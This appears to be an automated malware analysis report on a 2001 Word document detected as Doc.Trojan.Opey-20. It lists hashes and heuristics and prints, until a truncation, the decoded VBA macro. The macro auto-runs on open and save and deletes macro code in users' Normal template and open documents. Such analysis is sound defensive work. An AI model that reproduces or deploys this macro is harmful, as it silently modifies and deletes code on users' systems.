Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2e09f924ba119b08…

MALICIOUS

Office (OLE)

45.0 KB Created: 2001-09-28 06:29:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: bc19bb62ace73a2547dd98c863f6f385 SHA-1: 3b93ef88fc6e2748fc1292c319969a40235c5379 SHA-256: 2e09f924ba119b08597c9d816834b2be2e031fd1fd11196fd3d85efd84025003
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro includes AutoOpen and AutoExec functions, indicating it is designed to run automatically when the document is opened. ClamAV detections suggest it is a known trojan. The presence of AutoOpen and AutoExec macros strongly suggests this file was delivered as a spearphishing attachment.

Heuristics 4

  • ClamAV: Doc.Trojan.Opey-20 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Opey-20
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8064 bytes
SHA-256: 7d53ec20554b899e2853e780afa26c4229a987e5a07bffa345ecd98e3cadd9c2
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "JiShenhua33"
' ------------------------------------------------------------------------------------
' 程序设计: 冀慎华  建行山东省分行
' 日期: 2001年3月
' 功能: 该程序把WORD菜单与工具条初始化到原来状态并删除本模块以外的宏模块.
'-------------------------------------------------------------------------------------
Const CurrentVersion = 33 '版本号
Const myName = "JiShenhua33" '本程序名
Sub AutoExec()
On Error Resume Next
    Call Initialize
    Call Immunize
End Sub
Sub AutoOpen()
On Error Resume Next
   Call Initialize
   Call Immunize
End Sub
Sub FileOpen()
On Error Resume Next
    Call Initialize
    Call Immunize
    Dialogs(wdDialogFileOpen).Show
    Call Immunize
End Sub
Sub FileSave()
On Error Resume Next
    Call Initialize
    Call Immunize
    If Not ActiveDocument.Saved Then ActiveDocument.Save
End Sub
Sub FileSaveAs()
On Error Resume Next
    Call Initialize
    Call Immunize
    Dialogs(wdDialogFileSaveAs).Show
End Sub
Function IsNewDoc(myDoc As Document) As Boolean
    Dim rightPart As String
    If (Left(myDoc.Name, 2) = "文档") Then
        rightPart = Right(myDoc.Name, Len(myDoc.Name) - 2)
        If IsNumeric(rightPart) Then IsNewDoc = True Else IsNewDoc = False
    ElseIf (Left(myDoc.Name, 3) = "Doc") Then
        rightPart = Right(myDoc.Name, Len(myDoc.Name) - 3)
        If IsNumeric(rightPart) Then IsNewDoc = True Else IsNewDoc = False
    Else
        IsNewDoc = False
    End If
End Function
Function Immunize()
On Error Resume Next
    
    Dim ModuleName$, OpenDocImmunized As Boolean
    Dim i%, J%, NmImmunized As Boolean
    Dim myInt As Integer
    Dim openDoc As Document
    
    NmImmunized = False
    For i = NormalTemplate.VBProject.VBComponents.Count To 1 Step -1
        ModuleName = NormalTemplate.VBProject.VBComponents(i).Name
        Select Case ModuleName
        Case "ThisDocument"
            myInt = NormalTemplate.VBProject.VBComponents(i).CodeModule.CountOfLines
            If myInt > 0 Then
                NormalTemplate.VBProject.VBComponents(i).CodeModule.DeleteLines 1, myInt
            End If
        Case "MyTools"
        Case "VirusReport", "JiShenhua" '旧版本杀病毒程序
            Application.OrganizerDelete _
                Source:=NormalTemplate.FullName, _
                Name:=ModuleName, _
                Object:=wdOrganizerObjectProjectItems
        Case Else
            If Left(ModuleName, 9) = "JiShenhua" Then '本程序
                myInt = Val(Right(ModuleName, 2))
                If myInt < CurrentVersion Then '当前程序的旧版本
                    Application.OrganizerDelete _
                        Source:=NormalTemplate.FullName, _
                        Name:=ModuleName, _
                        Object:=wdOrganizerObjectProjectItems
                Else
                    NmImmunized = True '是当前版本或更高版本程序
                End If
            Else '其他程序
                msg = "你的 Word 系统中附带有宏程序模块 " + ModuleName + _
                    ", 极有可能是宏病毒,请选择 '是' 清除该病毒."
                If MsgBox(msg, vbYesNo, "冀慎华向您报告:") = vbYes Then
                    Application.OrganizerDelete _
                        Source:=NormalTemplate.FullName, _
                        Name:=ModuleName, _
                        Object:=wdOrganizerObjectProjectItems
                End If
            End If
        End Select
    Next i
    
    For Each openDoc In Documents
        OpenDocImmunized = False
        For J = openDoc.VBProject.VBComponents.Count To 1 Step -1
            ModuleName = openDoc.VBProject.VBComponents(J).Name
            Select Case ModuleName
                Case "ThisDocument"
                    myInt = openDoc.VBProject.VBComponents(J).CodeModule.CountOfLines
                    If myInt > 0 Then
                     
... (truncated)